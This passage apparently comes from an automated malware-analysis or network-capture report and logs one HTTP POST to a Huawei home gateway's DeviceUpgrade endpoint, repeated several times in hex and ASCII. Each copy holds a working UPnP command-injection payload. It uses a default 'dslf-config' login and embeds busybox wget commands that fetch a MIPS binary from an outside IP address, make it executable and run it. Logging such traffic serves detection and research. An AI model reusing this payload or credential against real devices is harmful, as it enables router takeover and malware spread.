6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
